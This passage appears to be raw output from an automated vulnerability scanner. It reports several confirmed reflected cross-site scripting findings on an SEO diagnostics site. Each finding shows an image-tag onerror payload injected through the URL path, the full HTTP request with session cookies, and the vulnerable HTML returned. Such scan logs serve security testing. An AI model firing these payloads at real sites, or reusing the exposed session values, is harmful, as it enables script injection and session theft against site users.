engines can determine how relevant you are vis-a-vis a search it to study the content on your website... </p> <table> <tr id="charts-row"> <td><div id="keywords_graph" style="width: 300px; height: 200px; margin: 0 auto"></div></td> <td><div id="doublePhrase_graph" style="width: 400px; height: 200px; margin: 0 auto"></div></td> </tr> </table> <ul><li><a href="#contentDetail">(See Content details)</a></li></ul> </div> <div class="clear"></div> </div><script type="text/javascript"> var chart_crawlability = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_crawlability.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Crawlability/14"); chart_crawlability.render("chart_crawlability"); var chart_credibility = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_credibility.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Credibility/5"); chart_credibility.render("chart_credibility"); var chart_code = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_code.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Code/6"); chart_code.render("chart_code");</script> <a name="crawlabilityDetail"></a><h2>Crawlability</h2> <div id="crawlabilityDetail"> <div class="share-buttons"> <p>Share this report on:</p> <div class="share"> <ul> <li><a onclick="return fbs_click()" title="facebook share" href="http://www.facebook.com/share.php?u=<url>" target="_blank"> <img src="http://www.seoq.com/quotient/img/facebook.jpg" width="28" height="28" alt="Share on Facebook" /></a> </li> <li><a href="http://twitter.com/home?status=Check my SEO at - http://www.seoq.com/quotient/2011/05/01/2840/><iMg src=N onerror=netsparker(9)>" target="_blank" title="twitter share" > <img src="http://www.seoq.com/quotient/img/twitter.jpg" width="28" height="28" alt="Share on twitter" /></a> </li> <li><a href="http://www.linkedin.com/shareArticle?mini=true&url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F05%2F01%2F2840%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=SEO+Quotient%EF%BF%BD+Diagnostic+Report&summary=&source=seoq.com" target="_blank" title="linkedin share"> <img src="http://www.seoq.com/quotient/img/linkedin.jpg" width="28" height="28" alt="Share on LinkedIn" /></a> </li> <li><a href="http://digg.com/submit?phase=2&url=http://www.seoq.com/quotient/2011/05/01/2840/><iMg src=N onerror=netsparker(9)>&title=SEO Quotient� Diagnostic Report&bodytext=" target="_blank" title="digg share"> <img src="http://www.seoq.com/quotient/img/digg.jpg" width="28" height="28" alt="Share on Digg" /></a> </li> <li><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F05%2F01%2F2840%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=stumbleupon_title" target="_blank" title="stumbleupon share"> <img src="http://www.seoq.com/quotient/img/stumbleupon.jpg" width="27" height="28" alt="Share on StumbleUpon" /></a> </li> <li><a href="http://technorati.com/faves?add=http://www.seoq.com/quotient/2011/05/01/2840/><iMg src=N onerror=netsparker(9)>" target="_blank" title="technorati share"> ..

- /quotient/2011/05/01/2838/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

/quotient/2011/05/01/2838/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

http://www.seoq.com/quotient/2011/05/01/2838/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

Parameters

Parameter	Type	Value
URI-BASED	Raw URI	><iMg src=N onerror=alert(9)>

Request

GET /quotient/2011/05/01/2838/%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E HTTP/1.1
Referer: http://www.seoq.com/quotient/2011/05/01/2838/www.xtilez.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; PHPSESSID=81vpd80f1tet77i3g4sh4nom04; CAKEPHP=mkgiit8dars4st0s51imtuc053
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:15:36 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; expires=Mon, 09-May-2011 02:15:37 GMT; path=/quotient
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" type="text/css" href="/quotient/css/style.css" /><script type="text/javascript">//<![CDATA[AC_FL_RunContent = 0;//]]></script> <script type="text/javascript" src="/quotient/js/jquery.js"></script> <script type="text/javascript" src="/quotient/js/jquery.validate.js"></script> <script type="text/javascript" src="/quotient/js/AC_RunActiveContent.js"></script><script type="text/javascript" src="/quotient/js/highcharts.js"></script> <script type="text/javascript" src="/quotient/js/excanvas.compiled.js"></script> <script type="text/javascript" src="/quotient/js/FusionCharts.js"></script> <script type="text/javascript" src="/quotient/js/jquery.simplemodal-1.3.5.js"></script> <script type="text/javascript" src="/quotient/js/seoq.tool.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui.min.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui-widgets.min.js"></script>
<script type="text/javascript">

</script>
</head>

<body>

<div class="wrapper">
<div id="header">
<div id="title">
<a href="http://www.seoq.com"><img alt="SEO Quotient™" title="SEO Quotient™" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/logo-web-analyzer-tool.jpg" /></a>
</div>
<div class="top_header">
<div id="social-media-buttons">Share: <a href="http://www.facebook.com/share.php?u=<url>" onclick="return fbs_click()"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/facebook-share-button-seo-tool.gif" alt="share on facebook" width="30" height="31"/></a><a href="http://del.icio.us/post?url=http://www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/delicious-share-button-seo-tool.gif" alt="Share on Delicious" width="29" height="31"/></a><a href="http://www.stumbleupon.com/submit?url=www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/stumbleupon-share-button-seo-tool.gif" alt="Share on Stumble Upon" width="30" height="31"/></a><a href="http://twitter.com/home?status=SEO Quotient, online SEO tool - www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/twitter-share-button-seo-tool.gif" alt="Share on Twitter" width="29" height="31"/></a>

</div>
<div class="google_form">
<form id="cse-search-box" action="http://www.seoq.com/search-results/">
<input type="hidden" value="002680724730993913492:hys1pl1blsa" name="cx" />
<input type="hidden" value="FORID:10" name="cof" />
<input type="hidden" value="UTF-8" name="ie" />
<input type="text" id="search-google" size="" name="q" style="border: 1px solid rgb(126, 157, 185); padding: 2px;" />
<input type="submit" id="submit-google" value="Search" name="sa" />
<input type="hidden" name="siteurl" value="www.seoq.com/" />
<input type="hidden" name="siteurl" value="www.seoq.com" /></form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
</div>
</div>
<div id="navbar">
<ul id="menu"> <li><a href="http://www.seoq.com/about-seo-quotient" title="About">About Us</a></li> <li><a href="http://www.seoq.com/web/professionals" title="Directory">Directory</a></li> <li class="current_page_item"> <a href="http://www.seoq.com/quotient" title="SEO Tools">SEO Tools</a> <ul class='children'> <li class="page_item page-item-2306"><a href="/quotient/analysis" title="SEO Analysis Tool">SEO Analysis Tool</a></li> <li class="page_item page-item-2291"><a href="/searchengine-analysis/" title="Technical SEO Analysis">Technical SEO Analysis</a></li> <li class="page_item page-item-2295"><a href="/blvdstatus/" title="Real-time Web Analytics">Real-time Web Analytics</a></li> <li class="page_item page-item-2299"><a href="/webstatshq/" title="Traffic Ranking Software">Traffic Ranking Software</a></li> </ul> </li> <li><a href="http://www.seoq.com/blog" title="Blog">Blog</a></li> <li> <a href="http://www.seoq.com/7-c-of-online-marketing-seo" title="SEO Tools">7 C’s</a> <ul class='children'> <li class="page_item page-item-2244"><a href="/7-c-of-online-marketing-seo/crawlability/" title="Crawlability">Crawlability</a></li> <li class="page_item page-item-2285"><a href="/7-c-of-online-marketing-seo/credibility/" title="Credibility">Credibility</a></li> </ul> </li> <li><a href="http://www.seoq.com/web/" title="Discussions">Discussions</a></li> </ul> </div>
<div id="rss-header"><a href="http://www.seoq.com/feed/"><img width="27" height="25" alt="RSS feed" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/rss-button-seo-tool.png" /></a></div>
<div id="secondary-menu" class="login"> <a href="http://www.seoq.com/web/users/login" title="Login">Login</a> <a href="http://www.seoq.com/web/users/register" title="Sign Up">Sign Up</a> </div> </div>
<div id="content-top-wrap">
<div id="content-bottom-wrap">
<div id="content">

<script type="text/javascript">function fbs_click() {u=location.href;t=document.title;window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}</script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script><link rel="stylesheet" type="text/css" href="http://www.highcharts.com/highslide/highslide.css" /><script type="text/javascript"> $(function() { $("#tabs").tabs(); }); function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2838/><iMg src=N onerror=netsparker(9)>';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;} $(function() { $(".report").hide(); $("#highLevelReport").hide(); $("#reportDoesNotExist").show(); }); </script> <div id="reportDoesNotExist" class="ui-tabs-panel"> <div class="share-buttons"> <p></p> <div class="share"></div> </div> <div class="clear"></div> <div id="entry-summary"> <p><strong>Report not found</strong> Please check the URL.<br /><br /> URL for this report:<a href="http://www.seoq.com/quotient/2011/05/01/2838/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2838/><iMg src=N onerror=netsparker(9)>ddd</a> </p> </div> </div> <div id="entry-summary"> <p>SEO Quotient™ website analysis of: <strong></strong><br /> URL for this report: <a href="http://www.seoq.com/quotient/2011/05/01/2838/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2838/><iMg src=N onerror=netsparker(9)></a></p> <p>This URL has been analyzed: 0 times </p> </div><div class="report"> <div id="highLevelReport"> <div class="info-1"> <div class="grid-1"> <h3>Crawlability </h3> <div id="chart_crawlability">Crawlability Score</div> <br /> <h4>Section 1: Crawlability</h4> <p>Crawlability is how easy it is for search engine spiders and robots to get inside your website ... scan the words, photos and videos and index that information in its archives...</p> <ul><li><a href="#crawlabilityDetail">(See Crawlability details)</a></li></ul> </div> <div class="grid-1"> <h3>Credibility </h3> <div id="chart_credibility">Credibility Score</div> <br /> <h4>Section 2: Credibility</h4> <p>Credibility has a lot to do with what other people, bloggers and webmasters have to say about you. For example, the more references or citations to your website, the more credibility you have...</p> <ul><li><a href="#credibilityDetail">(See Credibility details)</a></li></ul> </div> <div class="grid-1 alpha"> <h3>Code </h3> <div id="chart_code">Code Score</div> <br /> <h4>Section 3: Code</h4> <p>Code refers to the extra emphasis you place on Content behind the scene. It involves meta tags, title tags, headings, hyperlinks, bullet lists and other techniques to bring more attention to specific words...</p> <ul><li><a href="#codeDetail">(See Code details)</a></li></ul> </div> </div> <div class="info-1"> <h3>Content </h3> <p>Content is the actual words, pictures, charts, graphs and videos you have. The only way search engines can determine how relevant you are vis-a-vis a search it to study the content on your website... </p> <table> <tr id="charts-row"> <td><div id="keywords_graph" style="width: 300px; height: 200px; margin: 0 auto"></div></td> <td><div id="doublePhrase_graph" style="width: 400px; height: 200px; margin: 0 auto"></div></td> </tr> </table> <ul><li><a href="#contentDetail">(See Content details)</a></li></ul> </div> <div class="clear"></div> </div><script type="text/javascript"> var chart_crawlability = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_crawlability.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Crawlability/14"); chart_crawlability.render("chart_crawlability"); var chart_credibility = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_credibility.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Credibility/5"); chart_credibility.render("chart_credibility"); var chart_code = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_code.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Code/6"); chart_code.render("chart_code");</script> <a name="crawlabilityDetail"></a><h2>Crawlability</h2> <div id="crawlabilityDetail"> <div class="share-buttons"> <p>Share this report on:</p> <div class="share"> <ul> <li><a onclick="return fbs_click()" title="facebook share" href="http://www.facebook.com/share.php?u=<url>" target="_blank"> <img src="http://www.seoq.com/quotient/img/facebook.jpg" width="28" height="28" alt="Share on Facebook" /></a> </li> <li><a href="http://twitter.com/home?status=Check my SEO at - http://www.seoq.com/quotient/2011/05/01/2838/><iMg src=N onerror=netsparker(9)>" target="_blank" title="twitter share" > <img src="http://www.seoq.com/quotient/img/twitter.jpg" width="28" height="28" alt="Share on twitter" /></a> </li> <li><a href="http://www.linkedin.com/shareArticle?mini=true&url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F05%2F01%2F2838%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=SEO+Quotient%EF%BF%BD+Diagnostic+Report&summary=&source=seoq.com" target="_blank" title="linkedin share"> <img src="http://www.seoq.com/quotient/img/linkedin.jpg" width="28" height="28" alt="Share on LinkedIn" /></a> </li> <li><a href="http://digg.com/submit?phase=2&url=http://www.seoq.com/quotient/2011/05/01/2838/><iMg src=N onerror=netsparker(9)>&title=SEO Quotient� Diagnostic Report&bodytext=" target="_blank" title="digg share"> <img src="http://www.seoq.com/quotient/img/digg.jpg" width="28" height="28" alt="Share on Digg" /></a> </li> <li><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F05%2F01%2F2838%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=stumbleupon_title" target="_blank" title="stumbleupon share"> <img src="http://www.seoq.com/quotient/img/stumbleupon.jpg" width="27" height="28" alt="Share on StumbleUpon" /></a> </li> <li><a href="http://technorati.com/faves?add=http://www.seoq.com/quotient/2011/05/01/2838/><iMg src=N onerror=netsparker(9)>" target="_blank" title="technorati share"> ..

- /quotient/2011/05/01/2839/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

/quotient/2011/05/01/2839/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

http://www.seoq.com/quotient/2011/05/01/2839/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

Parameters

Parameter	Type	Value
URI-BASED	Raw URI	><iMg src=N onerror=alert(9)>

Request

GET /quotient/2011/05/01/2839/%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E HTTP/1.1
Referer: http://www.seoq.com/quotient/2011/05/01/2839/www.ufjveykdje.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; PHPSESSID=81vpd80f1tet77i3g4sh4nom04; CAKEPHP=mkgiit8dars4st0s51imtuc053
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:15:38 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; expires=Mon, 09-May-2011 02:15:38 GMT; path=/quotient
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" type="text/css" href="/quotient/css/style.css" /><script type="text/javascript">//<![CDATA[AC_FL_RunContent = 0;//]]></script> <script type="text/javascript" src="/quotient/js/jquery.js"></script> <script type="text/javascript" src="/quotient/js/jquery.validate.js"></script> <script type="text/javascript" src="/quotient/js/AC_RunActiveContent.js"></script><script type="text/javascript" src="/quotient/js/highcharts.js"></script> <script type="text/javascript" src="/quotient/js/excanvas.compiled.js"></script> <script type="text/javascript" src="/quotient/js/FusionCharts.js"></script> <script type="text/javascript" src="/quotient/js/jquery.simplemodal-1.3.5.js"></script> <script type="text/javascript" src="/quotient/js/seoq.tool.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui.min.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui-widgets.min.js"></script>
<script type="text/javascript">

</script>
</head>

<body>

<div class="wrapper">
<div id="header">
<div id="title">
<a href="http://www.seoq.com"><img alt="SEO Quotient™" title="SEO Quotient™" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/logo-web-analyzer-tool.jpg" /></a>
</div>
<div class="top_header">
<div id="social-media-buttons">Share: <a href="http://www.facebook.com/share.php?u=<url>" onclick="return fbs_click()"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/facebook-share-button-seo-tool.gif" alt="share on facebook" width="30" height="31"/></a><a href="http://del.icio.us/post?url=http://www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/delicious-share-button-seo-tool.gif" alt="Share on Delicious" width="29" height="31"/></a><a href="http://www.stumbleupon.com/submit?url=www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/stumbleupon-share-button-seo-tool.gif" alt="Share on Stumble Upon" width="30" height="31"/></a><a href="http://twitter.com/home?status=SEO Quotient, online SEO tool - www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/twitter-share-button-seo-tool.gif" alt="Share on Twitter" width="29" height="31"/></a>

</div>
<div class="google_form">
<form id="cse-search-box" action="http://www.seoq.com/search-results/">
<input type="hidden" value="002680724730993913492:hys1pl1blsa" name="cx" />
<input type="hidden" value="FORID:10" name="cof" />
<input type="hidden" value="UTF-8" name="ie" />
<input type="text" id="search-google" size="" name="q" style="border: 1px solid rgb(126, 157, 185); padding: 2px;" />
<input type="submit" id="submit-google" value="Search" name="sa" />
<input type="hidden" name="siteurl" value="www.seoq.com/" />
<input type="hidden" name="siteurl" value="www.seoq.com" /></form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
</div>
</div>
<div id="navbar">
<ul id="menu"> <li><a href="http://www.seoq.com/about-seo-quotient" title="About">About Us</a></li> <li><a href="http://www.seoq.com/web/professionals" title="Directory">Directory</a></li> <li class="current_page_item"> <a href="http://www.seoq.com/quotient" title="SEO Tools">SEO Tools</a> <ul class='children'> <li class="page_item page-item-2306"><a href="/quotient/analysis" title="SEO Analysis Tool">SEO Analysis Tool</a></li> <li class="page_item page-item-2291"><a href="/searchengine-analysis/" title="Technical SEO Analysis">Technical SEO Analysis</a></li> <li class="page_item page-item-2295"><a href="/blvdstatus/" title="Real-time Web Analytics">Real-time Web Analytics</a></li> <li class="page_item page-item-2299"><a href="/webstatshq/" title="Traffic Ranking Software">Traffic Ranking Software</a></li> </ul> </li> <li><a href="http://www.seoq.com/blog" title="Blog">Blog</a></li> <li> <a href="http://www.seoq.com/7-c-of-online-marketing-seo" title="SEO Tools">7 C’s</a> <ul class='children'> <li class="page_item page-item-2244"><a href="/7-c-of-online-marketing-seo/crawlability/" title="Crawlability">Crawlability</a></li> <li class="page_item page-item-2285"><a href="/7-c-of-online-marketing-seo/credibility/" title="Credibility">Credibility</a></li> </ul> </li> <li><a href="http://www.seoq.com/web/" title="Discussions">Discussions</a></li> </ul> </div>
<div id="rss-header"><a href="http://www.seoq.com/feed/"><img width="27" height="25" alt="RSS feed" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/rss-button-seo-tool.png" /></a></div>
<div id="secondary-menu" class="login"> <a href="http://www.seoq.com/web/users/login" title="Login">Login</a> <a href="http://www.seoq.com/web/users/register" title="Sign Up">Sign Up</a> </div> </div>
<div id="content-top-wrap">
<div id="content-bottom-wrap">
<div id="content">

<script type="text/javascript">function fbs_click() {u=location.href;t=document.title;window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}</script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script><link rel="stylesheet" type="text/css" href="http://www.highcharts.com/highslide/highslide.css" /><script type="text/javascript"> $(function() { $("#tabs").tabs(); }); function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2839/><iMg src=N onerror=netsparker(9)>';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;} $(function() { $(".report").hide(); $("#highLevelReport").hide(); $("#reportDoesNotExist").show(); }); </script> <div id="reportDoesNotExist" class="ui-tabs-panel"> <div class="share-buttons"> <p></p> <div class="share"></div> </div> <div class="clear"></div> <div id="entry-summary"> <p><strong>Report not found</strong> Please check the URL.<br /><br /> URL for this report:<a href="http://www.seoq.com/quotient/2011/05/01/2839/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2839/><iMg src=N onerror=netsparker(9)>ddd</a> </p> </div> </div> <div id="entry-summary"> <p>SEO Quotient™ website analysis of: <strong></strong><br /> URL for this report: <a href="http://www.seoq.com/quotient/2011/05/01/2839/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2839/><iMg src=N onerror=netsparker(9)></a></p> <p>This URL has been analyzed: 0 times </p> </div><div class="report"> <div id="highLevelReport"> <div class="info-1"> <div class="grid-1"> <h3>Crawlability </h3> <div id="chart_crawlability">Crawlability Score</div> <br /> <h4>Section 1: Crawlability</h4> <p>Crawlability is how easy it is for search engine spiders and robots to get inside your website ... scan the words, photos and videos and index that information in its archives...</p> <ul><li><a href="#crawlabilityDetail">(See Crawlability details)</a></li></ul> </div> <div class="grid-1"> <h3>Credibility </h3> <div id="chart_credibility">Credibility Score</div> <br /> <h4>Section 2: Credibility</h4> <p>Credibility has a lot to do with what other people, bloggers and webmasters have to say about you. For example, the more references or citations to your website, the more credibility you have...</p> <ul><li><a href="#credibilityDetail">(See Credibility details)</a></li></ul> </div> <div class="grid-1 alpha"> <h3>Code </h3> <div id="chart_code">Code Score</div> <br /> <h4>Section 3: Code</h4> <p>Code refers to the extra emphasis you place on Content behind the scene. It involves meta tags, title tags, headings, hyperlinks, bullet lists and other techniques to bring more attention to specific words...</p> <ul><li><a href="#codeDetail">(See Code details)</a></li></ul> </div> </div> <div class="info-1"> <h3>Content </h3> <p>Content is the actual words, pictures, charts, graphs and videos you have. The only way search engines can determine how relevant you are vis-a-vis a search it to study the content on your website... </p> <table> <tr id="charts-row"> <td><div id="keywords_graph" style="width: 300px; height: 200px; margin: 0 auto"></div></td> <td><div id="doublePhrase_graph" style="width: 400px; height: 200px; margin: 0 auto"></div></td> </tr> </table> <ul><li><a href="#contentDetail">(See Content details)</a></li></ul> </div> <div class="clear"></div> </div><script type="text/javascript"> var chart_crawlability = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_crawlability.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Crawlability/14"); chart_crawlability.render("chart_crawlability"); var chart_credibility = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_credibility.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Credibility/5"); chart_credibility.render("chart_credibility"); var chart_code = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_code.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Code/6"); chart_code.render("chart_code");</script> <a name="crawlabilityDetail"></a><h2>Crawlability</h2> <div id="crawlabilityDetail"> <div class="share-buttons"> <p>Share this report on:</p> <div class="share"> <ul> <li><a onclick="return fbs_click()" title="facebook share" href="http://www.facebook.com/share.php?u=<url>" target="_blank"> <img src="http://www.seoq.com/quotient/img/facebook.jpg" width="28" height="28" alt="Share on Facebook" /></a> </li> <li><a href="http://twitter.com/home?status=Check my SEO at - http://www.seoq.com/quotient/2011/05/01/2839/><iMg src=N onerror=netsparker(9)>" target="_blank" title="twitter share" > <img src="http://www.seoq.com/quotient/img/twitter.jpg" width="28" height="28" alt="Share on twitter" /></a> </li> <li><a href="http://www.linkedin.com/shareArticle?mini=true&url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F05%2F01%2F2839%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=SEO+Quotient%EF%BF%BD+Diagnostic+Report&summary=&source=seoq.com" target="_blank" title="linkedin share"> <img src="http://www.seoq.com/quotient/img/linkedin.jpg" width="28" height="28" alt="Share on LinkedIn" /></a> </li> <li><a href="http://digg.com/submit?phase=2&url=http://www.seoq.com/quotient/2011/05/01/2839/><iMg src=N onerror=netsparker(9)>&title=SEO Quotient� Diagnostic Report&bodytext=" target="_blank" title="digg share"> <img src="http://www.seoq.com/quotient/img/digg.jpg" width="28" height="28" alt="Share on Digg" /></a> </li> <li><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F05%2F01%2F2839%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=stumbleupon_title" target="_blank" title="stumbleupon share"> <img src="http://www.seoq.com/quotient/img/stumbleupon.jpg" width="27" height="28" alt="Share on StumbleUpon" /></a> </li> <li><a href="http://technorati.com/faves?add=http://www.seoq.com/quotient/2011/05/01/2839/><iMg src=N onerror=netsparker(9)>" target="_blank" title="technorati share"> ..

- /quotient/2011/05/01/2837/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

/quotient/2011/05/01/2837/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

http://www.seoq.com/quotient/2011/05/01/2837/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

Parameters

Parameter	Type	Value
URI-BASED	Raw URI	><iMg src=N onerror=alert(9)>

Request

GET /quotient/2011/05/01/2837/%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E HTTP/1.1
Referer: http://www.seoq.com/quotient/2011/05/01/2837/www.levnvkrghp.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; PHPSESSID=81vpd80f1tet77i3g4sh4nom04; CAKEPHP=mkgiit8dars4st0s51imtuc053
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:15:41 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; expires=Mon, 09-May-2011 02:15:41 GMT; path=/quotient
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" type="text/css" href="/quotient/css/style.css" /><script type="text/javascript">//<![CDATA[AC_FL_RunContent = 0;//]]></script> <script type="text/javascript" src="/quotient/js/jquery.js"></script> <script type="text/javascript" src="/quotient/js/jquery.validate.js"></script> <script type="text/javascript" src="/quotient/js/AC_RunActiveContent.js"></script><script type="text/javascript" src="/quotient/js/highcharts.js"></script> <script type="text/javascript" src="/quotient/js/excanvas.compiled.js"></script> <script type="text/javascript" src="/quotient/js/FusionCharts.js"></script> <script type="text/javascript" src="/quotient/js/jquery.simplemodal-1.3.5.js"></script> <script type="text/javascript" src="/quotient/js/seoq.tool.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui.min.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui-widgets.min.js"></script>
<script type="text/javascript">

</script>
</head>

<body>

<div class="wrapper">
<div id="header">
<div id="title">
<a href="http://www.seoq.com"><img alt="SEO Quotient™" title="SEO Quotient™" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/logo-web-analyzer-tool.jpg" /></a>
</div>
<div class="top_header">
